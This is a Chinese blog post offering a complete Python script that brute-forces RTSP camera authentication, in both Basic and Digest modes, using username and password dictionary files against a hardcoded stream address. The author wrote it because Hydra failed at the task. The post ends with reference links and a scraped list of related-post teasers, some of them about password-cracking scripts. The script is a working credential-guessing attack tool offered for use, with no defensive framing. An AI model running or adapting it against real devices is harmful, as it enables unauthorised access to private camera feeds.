python3爆力破解rtsp脚本
一、说明
hydra是说已实现了rtsp的爆力破解,但是使用时发现字典中明明已包含正确的用户名密码hydra却还没检测出来;
拦截数据包查看,感觉hydra只是尝试去匿名访问,并没有发送用户名密码去验证,所以自己写了个脚本。
二、脚本代码
rtsp有Basic和Digest两种验证方式,这里默认使用‘Basic’,如果想用‘Digest’方式将代码中的config_dict['brute_force_method']修改为‘Digest’
注意得自己在脚本的同目录下,放好“username.txt”(一行为一个用户名的形式)和"password.txt"(一行为一个密码的形式)两个字典文件
import socket
import hashlib
import base64 #define variables we need
global config_dict
config_dict = {
"server_ip": "10.10.6.94",
"server_port": 554,
"server_path": "/chID=8&streamType=main",
"user_agent": "RTSP Client",
"buffer_len": 1024,
"username_file": "username.txt",
"password_file": "password.txt",
"brute_force_method": 'Basic'
} def gen_base_method_header(auth_64):
global config_dict
#build the prefix of msg to send
str_base_method_header = 'DESCRIBE rtsp://'+config_dict["server_ip"]+':'+str(config_dict["server_port"])+config_dict["server_path"] + ' RTSP/1.0\r\n'
str_base_method_header += 'CSeq: 4\r\n'
str_base_method_header += 'User-Agent: '+config_dict["user_agent"]+'\r\n'
str_base_method_header += 'Accept: application/sdp\r\n'
str_base_method_header += 'Authorization: Basic '+auth_64 + ' \r\n'
str_base_method_header += '\r\n'
return str_base_method_header def base_method_brute_force(socket_send,username,password):
global config_dict
# use base64 to encode username and password
auth_64 = base64.b64encode((username + ":" + password).encode("utf-8")).decode()
# try to auth server
str_base_method_header = gen_base_method_header(auth_64)
socket_send.send(str_base_method_header.encode())
msg_recv = socket_send.recv(config_dict["buffer_len"]).decode()
# if the server response '200 OK' It means the username and password pair is right
if '200 OK' in msg_recv:
print("found key -- " + username + ":" + password) def gen_digest_describe_header():
global config_dict
str_digest_describe_header = 'DESCRIBE rtsp://'+config_dict["server_ip"]+':'+str(config_dict["server_port"])+config_dict["server_path"] + ' RTSP/1.0\r\n'
str_digest_describe_header += 'CSeq: 4\r\n'
str_digest_describe_header += 'User-Agent: '+config_dict["user_agent"]+'\r\n'
str_digest_describe_header += 'Accept: application/sdp\r\n'
str_digest_describe_header += '\r\n'
return str_digest_describe_header def gen_response_value(url,username,password,realm,nonce):
global config_dict
frist_pre_md5_value = hashlib.md5((username + ':' + realm + ':' + password).encode()).hexdigest()
first_post_md5_value = hashlib.md5(('DESCRIBE:' + url).encode()).hexdigest()
response_value = hashlib.md5((frist_pre_md5_value + ':' + nonce + ':' + first_post_md5_value).encode()).hexdigest()
return response_value def gen_digest_describe_auth_header(username,password,realm_value,nonce_value):
global config_dict
url = 'rtsp://' + config_dict['server_ip'] + ':' + str(config_dict['server_port']) + config_dict['server_path']
response_value = gen_response_value(url, username, password,realm_value, nonce_value)
str_describe_auth_header = 'DESCRIBE rtsp://' + config_dict['server_ip'] + ':' + str(config_dict['server_port']) + \
config_dict['server_path'] + ' RTSP/1.0\r\n'
str_describe_auth_header += 'CSeq: 5\r\n'
str_describe_auth_header += 'Authorization: Digest username="' + username + '", realm="' + realm_value + '", nonce="' + nonce_value + '", uri="' + url + '", response="' + response_value + '"\r\n'
str_describe_auth_header += 'User-Agent: ' + config_dict['user_agent'] + '\r\n'
str_describe_auth_header += 'Accept: application/sdp\r\n'
str_describe_auth_header += '\r\n'
return str_describe_auth_header def digest_method_brute_force(socket_send,username,password,realm_value,nonce_value):
global config_dict
str_digest_describe_auth_header = gen_digest_describe_auth_header(username,password,realm_value,nonce_value)
socket_send.send(str_digest_describe_auth_header.encode())
msg_recv = socket_send.recv(config_dict['buffer_len']).decode()
if '200 OK' in msg_recv:
print("found key -- " + username + ":" + password) #create socket to server
socket_send = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
socket_send.connect((config_dict["server_ip"],config_dict["server_port"])) #decide use what method to brute force
if config_dict['brute_force_method'] == 'Basic':
print('now use basic method to brute force')
with open(config_dict["username_file"],"r") as usernames:
for username in usernames:
username = username.strip("\n")
with open(config_dict["password_file"],"r") as passwords:
for password in passwords:
password = password.strip("\n")
base_method_brute_force(socket_send, username, password)
else:
print('now use digest method to brute force')
with open(config_dict["username_file"], "r") as usernames:
for username in usernames:
username = username.strip("\n")
with open(config_dict["password_file"], "r") as passwords:
for password in passwords:
password = password.strip("\n")
str_digest_describe_header = gen_digest_describe_header()
socket_send.send(str_digest_describe_header.encode())
msg_recv = socket_send.recv(config_dict['buffer_len']).decode()
realm_pos = msg_recv.find('realm')
realm_value_begin_pos = msg_recv.find('"',realm_pos)+1
realm_value_end_pos = msg_recv.find('"',realm_pos+8)
realm_value = msg_recv[realm_value_begin_pos:realm_value_end_pos]
nonce_pos = msg_recv.find('nonce')
nonce_value_begin_pos = msg_recv.find('"',nonce_pos)+1
nonce_value_end_pos = msg_recv.find('"',nonce_pos+8)
nonce_value = msg_recv[nonce_value_begin_pos:nonce_value_end_pos]
digest_method_brute_force(socket_send, username, password,realm_value,nonce_value)
socket_send.close()
使用Basic方式,运行结果如下:
使用nonce方式,运行结果如下:
参考:
https://www.cnblogs.com/lidabo/p/6472982.html
https://www.cnblogs.com/MikeZhang/archive/2012/10/29/rtspTcpClient_DSS_20121029.html
python3爆力破解rtsp脚本的更多相关文章
- contos防爆力破解密码
最近看了一篇文章ssh的爆力破解所以自己就做了一下防爆力破解denyhost 下载denyhost的软件包并上传的服务器下载地址https://sourceforge.net/projects/den ...
- python 暴力破解密码脚本
python 暴力破解密码脚本 以下,仅为个人测试代码,环境也是测试环境,暴力破解原理都是一样的, 假设要暴力破解登陆网站www.a.com 用户 testUser的密码, 首先,该网站登陆的验证要支 ...
- zip密码破解小脚本
zip密码破解小脚本 博主: 逍遥子 发布时间:2018 年 05 月 31 日 2745次浏览 1 条评论 1074字数 分类: kali 专栏 首页 正文 分享到: 文件源码 import ...
- python3实现的rtsp客户端脚本
一.说明 此客户端使用python3编写 此客户端实现RTSP的OPTIONS, DESCRIBE, SETUP , PLAY, GET_PARAMETER,TEARDOWN方法,未实现ANNOUNC ...
- ubuntu python3和python2切换脚本
最近在ubuntu上开发较多,有些工具只能在python2运行,而开发又是在python3上做的开发,所以写个脚本方便在python2和python3之间切换. 切换成python2的文件usepy2 ...
- 基于python3的手机号生成脚本
今天利用业余,自己突发想法来写个手机号码生成的脚本,其实自己用的方法很简单,想必肯定又不少人写的比我的好,我只是自己闲来无聊搞一下, #作者:雷子 #qq:952943386 #日期:2016年7月1 ...
- Python3设置在shell脚本中自动补全功能的方法
本篇博客将会简短的介绍,如何在ubuntu中设置python自动补全功能. 需求:由于python中的内建函数较多,我们在百纳乘时,可能记不清函数的名字,同时自动补全功能,加快了我们开发的效率. 方法 ...
- perl6 单线程破解phpmyadmin脚本
use HTTP::UserAgent; my $ua = HTTP::UserAgent.new; my $url = 'http://localhost/phpMyAdmin/index.php' ...
- Python3.5+selenium(11)脚本模块化&参数化
mail126.py脚本如下 from selenium import webdriver from time import sleep from model1 import Login driver ...
随机推荐
- 2. maven的配置和使用
参考网址:创建maven项目 引言:关于使用idea创建maven工程,以上的这篇博客已经写的很清楚,可以完全参照,我这里就不在重复,以下只 针对上面的这个教程不足或者描述不全面的地方做补充. 目录: ...
- Windows下Oracle创建数据库的3种方式
1. Creating a Database with DBCA DatabaseConfiguration Assistant (DBCA) is the preferred way to cr ...
- ArrayList的详解
数组一旦给定大小就是固定的,只能放同类型的不能再改,还有一种高级的可扩充的,就是arrayList类,被称作动态数组或者集合. 使用步骤: 1. 引用命名空间system.collections: 2 ...
- Java学习必备书籍推荐终极版!
Java 基础 <Head First Java>(推荐,豆瓣评分 8.7,1.0K+人评价): 可以说是我的 Java 启蒙书籍了,特别适合新手读当然也适合我们用来温故 Java 知识点 ...
- Codeforces 101173 C - Convex Contour
思路: 如果所有的图形都是三角形,那么答案是2*n+1 否则轮廓肯定触到了最上面,要使轮廓线最短,那么轮廓肯定是中间一段平的 我们考虑先将轮廓线赋为2*n+2,然后删去左右两边多余的部分 如果最左边或 ...
- ionic 搜索双向数据绑定失效
1.用data对象存储变化的数据 js: $scope.data={}; $scope.data.keywords = ""; $scope.search = function() ...
- XLua与CSharp交互的采坑点 : 热修复返回值为 Int 的CSharp方法
1.假如CS的一个类中有如下逻辑: using System.Collections; using System.Collections.Generic; using UnityEngine; usi ...
- 如何在windows下安装与配置Appium
appium是一款open source 移动自动化测试框架,既支持Android 也支持IOS 工具/原料 JDK adt-bundle-windows node python appium rob ...
- C#调用EXE
1.问题意义 据说界面程序开发,首选C#(像lebview之类的也很好) 但是,能不能用其他语言开发核心代码,只用C#做界面?毕竟每种语言都有自己擅长的领域. 2.exe程序 比如有个example. ...
- 雷林鹏分享:C# 程序结构
C# 程序结构 在我们学习 C# 编程语言的基础构件块之前,让我们先看一下 C# 的最小的程序结构,以便作为接下来章节的参考. C# Hello World 实例 一个 C# 程序主要包括以下部分: ...